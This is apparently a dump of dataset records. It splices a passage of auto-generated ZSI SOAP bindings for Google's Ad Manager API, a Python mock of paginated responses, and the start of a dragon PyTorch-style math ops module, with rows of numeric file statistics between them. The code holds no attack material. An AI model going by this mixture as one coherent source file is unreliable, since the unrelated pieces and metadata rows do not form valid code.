ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class PermissionError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "PermissionError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.PermissionError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","PermissionError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.PermissionError_Def.__bases__:
bases = list(ns0.PermissionError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.PermissionError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class QuotaError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "QuotaError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.QuotaError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","QuotaError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.QuotaError_Def.__bases__:
bases = list(ns0.QuotaError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.QuotaError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class RequiredError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "RequiredError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.RequiredError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","RequiredError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.RequiredError_Def.__bases__:
bases = list(ns0.RequiredError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.RequiredError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class ServerError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ServerError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.ServerError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","ServerError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.ServerError_Def.__bases__:
bases = list(ns0.ServerError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.ServerError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class SoapResponseHeader_Def(ZSI.TCcompound.ComplexType, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "SoapResponseHeader")
def __init__(self, pname, ofwhat=(), attributes=None, extend=False, restrict=False, **kw):
ns = ns0.SoapResponseHeader_Def.schema
TClist = [ZSI.TC.String(pname=(ns,"requestId"), aname="_requestId", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"responseTime"), aname="_responseTime", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
ZSI.TCcompound.ComplexType.__init__(self, None, TClist, pname=pname, inorder=0, **kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._requestId = None
self._responseTime = None
return
Holder.__name__ = "SoapResponseHeader_Holder"
self.pyclass = Holder
class StatementError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "StatementError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.StatementError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","StatementError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.StatementError_Def.__bases__:
bases = list(ns0.StatementError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.StatementError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class TypeError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "TypeError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.TypeError_Def.schema
TClist = []
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.TypeError_Def.__bases__:
bases = list(ns0.TypeError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.TypeError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class SoapRequestHeader_Def(ZSI.TCcompound.ComplexType, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "SoapRequestHeader")
def __init__(self, pname, ofwhat=(), attributes=None, extend=False, restrict=False, **kw):
ns = ns0.SoapRequestHeader_Def.schema
TClist = [ZSI.TC.String(pname=(ns,"authToken"), aname="_authToken", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"networkCode"), aname="_networkCode", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"applicationName"), aname="_applicationName", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"oAuthToken"), aname="_oAuthToken", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
ZSI.TCcompound.ComplexType.__init__(self, None, TClist, pname=pname, inorder=0, **kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._authToken = None
self._networkCode = None
self._applicationName = None
self._oAuthToken = None
return
Holder.__name__ = "SoapRequestHeader_Holder"
self.pyclass = Holder
class ApiError_Def(ZSI.TCcompound.ComplexType, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ApiError")
def __init__(self, pname, ofwhat=(), attributes=None, extend=False, restrict=False, **kw):
ns = ns0.ApiError_Def.schema
TClist = [ZSI.TC.String(pname=(ns,"fieldPath"), aname="_fieldPath", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"trigger"), aname="_trigger", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"errorString"), aname="_errorString", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"ApiError.Type"), aname="_ApiError_Type", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
ZSI.TCcompound.ComplexType.__init__(self, None, TClist, pname=pname, inorder=0, **kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._fieldPath = None
self._trigger = None
self._errorString = None
self._ApiError_Type = None
return
Holder.__name__ = "ApiError_Holder"
self.pyclass = Holder
class ApiException_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ApiException")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.ApiException_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","ApiError",lazy=False)(pname=(ns,"errors"), aname="_errors", minOccurs=0, maxOccurs="unbounded", nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApplicationException_Def not in ns0.ApiException_Def.__bases__:
bases = list(ns0.ApiException_Def.__bases__)
bases.insert(0, ns0.ApplicationException_Def)
ns0.ApiException_Def.__bases__ = tuple(bases)
ns0.ApplicationException_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class ApplicationException_Def(ZSI.TCcompound.ComplexType, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ApplicationException")
def __init__(self, pname, ofwhat=(), attributes=None, extend=False, restrict=False, **kw):
ns = ns0.ApplicationException_Def.schema
TClist = [ZSI.TC.String(pname=(ns,"message"), aname="_message", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"ApplicationException.Type"), aname="_ApplicationException_Type", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
ZSI.TCcompound.ComplexType.__init__(self, None, TClist, pname=pname, inorder=0, **kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._message = None
self._ApplicationException_Type = None
return
Holder.__name__ = "ApplicationException_Holder"
self.pyclass = Holder
class ApiVersionError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ApiVersionError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class AuthenticationError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "AuthenticationError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class CommonError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "CommonError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class InternalApiError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "InternalApiError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class NotNullError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "NotNullError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class ParseError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ParseError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class PermissionError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "PermissionError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class QuotaError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "QuotaError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class RequiredError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "RequiredError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class ServerError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ServerError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class StatementError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "StatementError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class getAllNetworks_Dec(ZSI.TCcompound.ComplexType, ElementDeclaration):
literal = "getAllNetworks"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
ns = ns0.getAllNetworks_Dec.schema
TClist = []
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","getAllNetworks")
kw["aname"] = "_getAllNetworks"
self.attribute_typecode_dict = {}
ZSI.TCcompound.ComplexType.__init__(self,None,TClist,inorder=0,**kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
return
Holder.__name__ = "getAllNetworks_Holder"
self.pyclass = Holder
class getAllNetworksResponse_Dec(ZSI.TCcompound.ComplexType, ElementDeclaration):
literal = "getAllNetworksResponse"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
ns = ns0.getAllNetworksResponse_Dec.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","Network",lazy=False)(pname=(ns,"rval"), aname="_rval", minOccurs=0, maxOccurs="unbounded", nillable=True, typed=False, encoded=kw.get("encoded"))]
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","getAllNetworksResponse")
kw["aname"] = "_getAllNetworksResponse"
self.attribute_typecode_dict = {}
ZSI.TCcompound.ComplexType.__init__(self,None,TClist,inorder=0,**kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._rval = []
return
Holder.__name__ = "getAllNetworksResponse_Holder"
self.pyclass = Holder
class ApiExceptionFault_Dec(ElementDeclaration):
literal = "ApiExceptionFault"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","ApiExceptionFault")
kw["aname"] = "_ApiExceptionFault"
if ns0.ApiException_Def not in ns0.ApiExceptionFault_Dec.__bases__:
bases = list(ns0.ApiExceptionFault_Dec.__bases__)
bases.insert(0, ns0.ApiException_Def)
ns0.ApiExceptionFault_Dec.__bases__ = tuple(bases)
ns0.ApiException_Def.__init__(self, **kw)
if self.pyclass is not None: self.pyclass.__name__ = "ApiExceptionFault_Dec_Holder"
class getCurrentNetwork_Dec(ZSI.TCcompound.ComplexType, ElementDeclaration):
literal = "getCurrentNetwork"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
ns = ns0.getCurrentNetwork_Dec.schema
TClist = []
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","getCurrentNetwork")
kw["aname"] = "_getCurrentNetwork"
self.attribute_typecode_dict = {}
ZSI.TCcompound.ComplexType.__init__(self,None,TClist,inorder=0,**kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
return
Holder.__name__ = "getCurrentNetwork_Holder"
self.pyclass = Holder
class getCurrentNetworkResponse_Dec(ZSI.TCcompound.ComplexType, ElementDeclaration):
literal = "getCurrentNetworkResponse"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
ns = ns0.getCurrentNetworkResponse_Dec.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","Network",lazy=False)(pname=(ns,"rval"), aname="_rval", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","getCurrentNetworkResponse")
kw["aname"] = "_getCurrentNetworkResponse"
self.attribute_typecode_dict = {}
ZSI.TCcompound.ComplexType.__init__(self,None,TClist,inorder=0,**kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._rval = None
return
Holder.__name__ = "getCurrentNetworkResponse_Holder"
self.pyclass = Holder
class updateNetwork_Dec(ZSI.TCcompound.ComplexType, ElementDeclaration):
literal = "updateNetwork"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
ns = ns0.updateNetwork_Dec.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","Network",lazy=False)(pname=(ns,"network"), aname="_network", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","updateNetwork")
kw["aname"] = "_updateNetwork"
self.attribute_typecode_dict = {}
ZSI.TCcompound.ComplexType.__init__(self,None,TClist,inorder=0,**kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._network = None
return
Holder.__name__ = "updateNetwork_Holder"
self.pyclass = Holder
class updateNetworkResponse_Dec(ZSI.TCcompound.ComplexType, ElementDeclaration):
literal = "updateNetworkResponse"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
ns = ns0.updateNetworkResponse_Dec.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","Network",lazy=False)(pname=(ns,"rval"), aname="_rval", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","updateNetworkResponse")
kw["aname"] = "_updateNetworkResponse"
self.attribute_typecode_dict = {}
ZSI.TCcompound.ComplexType.__init__(self,None,TClist,inorder=0,**kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._rval = None
return
Holder.__name__ = "updateNetworkResponse_Holder"
self.pyclass = Holder
class RequestHeader_Dec(ElementDeclaration):
literal = "RequestHeader"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","RequestHeader")
kw["aname"] = "_RequestHeader"
if ns0.SoapRequestHeader_Def not in ns0.RequestHeader_Dec.__bases__:
bases = list(ns0.RequestHeader_Dec.__bases__)
bases.insert(0, ns0.SoapRequestHeader_Def)
ns0.RequestHeader_Dec.__bases__ = tuple(bases)
ns0.SoapRequestHeader_Def.__init__(self, **kw)
if self.pyclass is not None: self.pyclass.__name__ = "RequestHeader_Dec_Holder"
class ResponseHeader_Dec(ElementDeclaration):
literal = "ResponseHeader"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","ResponseHeader")
kw["aname"] = "_ResponseHeader"
if ns0.SoapResponseHeader_Def not in ns0.ResponseHeader_Dec.__bases__:
bases = list(ns0.ResponseHeader_Dec.__bases__)
bases.insert(0, ns0.SoapResponseHeader_Def)
ns0.ResponseHeader_Dec.__bases__ = tuple(bases)
ns0.SoapResponseHeader_Def.__init__(self, **kw)
if self.pyclass is not None: self.pyclass.__name__ = "ResponseHeader_Dec_Holder"
# end class ns0 (tns: https://www.google.com/apis/ads/publisher/v201010)
| 57.701493
| 1,029
| 0.631086
| 3,730
| 34,794
| 5.644772
| 0.034316
| 0.033056
| 0.043885
| 0.053289
| 0.835051
| 0.773308
| 0.75184
| 0.75184
| 0.742104
| 0.721016
| 0
| 0.023248
| 0.240932
| 34,794
| 602
| 1,030
| 57.797342
| 0.773958
| 0.021958
| 0
| 0.547059
| 1
| 0
| 0.167499
| 0.024114
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096078
| false
| 0
| 0.005882
| 0.003922
| 0.245098
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f76acc881f9a49f22f6eeaeba9e6b78a515b1b65
| 916
|
py
|
Python
|
chris/tests/mocks/data/pagination.py
|
FNNDSC/caw
|
a41761c4502481f6ccb60ef6e9956464c9b30eb9
|
[
"MIT"
] | null | null | null |
chris/tests/mocks/data/pagination.py
|
FNNDSC/caw
|
a41761c4502481f6ccb60ef6e9956464c9b30eb9
|
[
"MIT"
] | 11
|
2021-04-23T21:25:29.000Z
|
2022-03-14T02:40:26.000Z
|
chris/tests/mocks/data/pagination.py
|
FNNDSC/caw
|
a41761c4502481f6ccb60ef6e9956464c9b30eb9
|
[
"MIT"
] | 1
|
2021-10-17T16:18:30.000Z
|
2021-10-17T16:18:30.000Z
|
responses = {
'https://example.com/api/v1/something/': {
'count': 5,
'next': 'https://example.com/api/v1/something/?limit=3&offset=3',
'previous': None,
'results': [
{'id': 1}, {'id': 2}, {'id': 3}
],
'collection_links': {}
},
'https://example.com/api/v1/something/?limit=3&offset=3': {
'count': 5,
'next': 'https://example.com/api/v1/something/?limit=3&offset=6',
'previous': 'https://example.com/api/v1/something/?limit=3',
'results': [
{'id': 4}, {'id': 5}, {'id': 6}
],
'collection_links': {}
},
'https://example.com/api/v1/something/?limit=3&offset=6': {
'count': 5,
'next': None,
'previous': 'https://example.com/api/v1/something/?limit=3',
'results': [
{'id': 7}, {'id': 8}
],
'collection_links': {}
},
}
| 30.533333
| 73
| 0.470524
| 102
| 916
| 4.196078
| 0.245098
| 0.196262
| 0.245327
| 0.294393
| 0.820093
| 0.820093
| 0.752336
| 0.752336
| 0.752336
| 0.752336
| 0
| 0.043077
| 0.290393
| 916
| 29
| 74
| 31.586207
| 0.615385
| 0
| 0
| 0.482759
| 0
| 0
| 0.522926
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e3902aedb74095cdf76b9f64f401c524945c425d
| 38,575
|
py
|
Python
|
torch/core/ops/math_ops.py
|
seetaresearch/dragon
|
fb47d86f5def9bbcc7f374800bf85e74111ae4b4
|
[
"BSD-2-Clause"
] | 30
|
2020-06-22T11:43:28.000Z
|
2022-03-23T02:33:39.000Z
|
torch/core/ops/math_ops.py
|
seetaresearch/dragon
|
fb47d86f5def9bbcc7f374800bf85e74111ae4b4
|
[
"BSD-2-Clause"
] | 1
|
2020-11-05T10:15:33.000Z
|
2020-11-05T10:15:33.000Z
|
torch/core/ops/math_ops.py
|
seetaresearch/dragon
|
fb47d86f5def9bbcc7f374800bf85e74111ae4b4
|
[
"BSD-2-Clause"
] | 4
|
2020-11-05T09:15:03.000Z
|
2021-04-01T02:30:38.000Z
|
# ------------------------------------------------------------
# Copyright (c) 2017-present, SeetaTech, Co.,Ltd.
#
# Licensed under the BSD 2-Clause License.
# You should have received a copy of the BSD 2-Clause License
# along with the software. If not, See,
#
# <https://opensource.org/licenses/BSD-2-Clause>
#
# ------------------------------------------------------------
"""Math ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from dragon.core.util import nest
from dragon.vm.torch.core.autograd.function import Function
from dragon.vm.torch.core.ops import constant_ops
def abs(input, out=None):
r"""Compute the absolute value of input.
.. math:: \text{out} = \left| \text{input} \right|
Examples:
```python
print(torch.abs(torch.tensor([-1, 0, 1]))) # [1, 0, 1]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Abs', out)
def add(input, other, out=None):
r"""Compute the element-wise addition.
.. math:: \text{out} = \text{input} + \text{other}
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to add.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Add', out)
def addmm(input, mat1, mat2, beta=1, alpha=1, out=None):
r"""Add input to the result of matrix-matrix multiplication.
.. math:: \text{out} = \alpha (\text{mat1} \times \text{mat2}) + \beta \text{input}
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
mat1 : dragon.vm.torch.Tensor
The first matrix.
mat2 : dragon.vm.torch.Tensor
The second matrix.
beta : float, optional, default=1
The value to :math:`\beta`.
alpha : float, optional, default=1
The value to :math:`\alpha`.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return Function.apply(
'Gemm', input.device, [mat1, mat2, input], outputs=[out],
alpha=float(alpha), beta=float(beta))
def argmax(input, dim, keepdim=False, out=None):
"""Return the index of maximum elements along the given dimension.
:attr:`dim` could be negative:
```python
# A negative dimension is the last-k dimension
x = torch.tensor([[1, 2, 3], [4, 5, 6]])
print(torch.argmax(x, dim=1))
print(torch.argmax(x, dim=-1)) # Equivalent
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
dim : int
The dimension to reduce.
keepdim : bool, optional, default=False
Keep the reduced dimension or not.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The index of maximum elements.
"""
return Function.apply(
'ArgMax', input.device, [input], outputs=[out],
axis=dim, keepdims=keepdim)
def argmin(input, dim, keepdim=False, out=None):
"""Return the index of minimum elements along the given dimension.
:attr:`dim` could be negative:
```python
# A negative dimension is the last-k dimension
x = torch.tensor([[1, 2, 3], [4, 5, 6]])
print(torch.argmin(x, dim=1))
print(torch.argmin(x, dim=-1)) # Equivalent
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
dim : int, optional
The dimension to reduce.
keepdim : bool, optional, default=False
Keep the reduced dimension or not.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The index of minimum elements.
"""
return Function.apply(
'ArgMin', input.device, [input], outputs=[out],
axis=dim, keepdims=keepdim)
def baddbmm(input, batch1, batch2, beta=1, alpha=1, out=None):
r"""Add input to the result of batched matrix-matrix multiplication.
.. math::
\text{out}_{i} = \alpha (\text{mat1}_{i} \times \text{mat2}_{i}) +
\beta \text{input}_{i}
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
batch1 : dragon.vm.torch.Tensor
The first batch of matrices.
batch2 : dragon.vm.torch.Tensor
The second batch of matrices.
beta : float, optional, default=1
The value to :math:`\beta`.
alpha : float, optional, default=1
The value to :math:`\alpha`.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
input1 = bmm(batch1, batch2)
input2 = input * beta if beta != 1 else input
input1 = input1 * alpha if alpha != 1 else input1
return add(input1, input2, out)
def bitwise_and(input, other, out=None):
r"""Compute the element-wise AND bitwise operation.
.. math:: \text{out} = \text{input} \mathbin{\&} \text{other}
Examples:
```python
a = torch.tensor([0, -1, 2, -3, 4])
b = torch.tensor([-4, 3, -2, 1, 0])
print(torch.bitwise_and(a, b)) # [0, 3, 2, 1, 0]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The first input tensor.
other : dragon.vm.torch.Tensor
The second input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'BitwiseAnd', out)
def bitwise_not(input, out=None):
r"""Compute the element-wise NOT bitwise operation.
.. math:: \text{out} = \,\,\sim \text{input}
Examples:
```python
# Typically, ``x`` is a bool tensor
print(torch.bitwise_not(torch.tensor([0, 1], 'bool'))) # [True, False]
# Otherwise, integral types are required (unsigned or signed)
# 00001101 (13) -> 11110010 (?)
print(torch.bitwise_not(torch.tensor(13, 'uint8'))) # 242
print(torch.bitwise_not(torch.tensor(13, 'int8'))) # -14
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'BitwiseNot', out)
def bitwise_or(input, other, out=None):
r"""Compute the element-wise OR bitwise operation.
.. math:: \text{out} = \text{input} \mathbin{|} \text{other}
Examples:
```python
a = torch.tensor([0, -1, 2, -3, 4])
b = torch.tensor([-4, 3, -2, 1, 0])
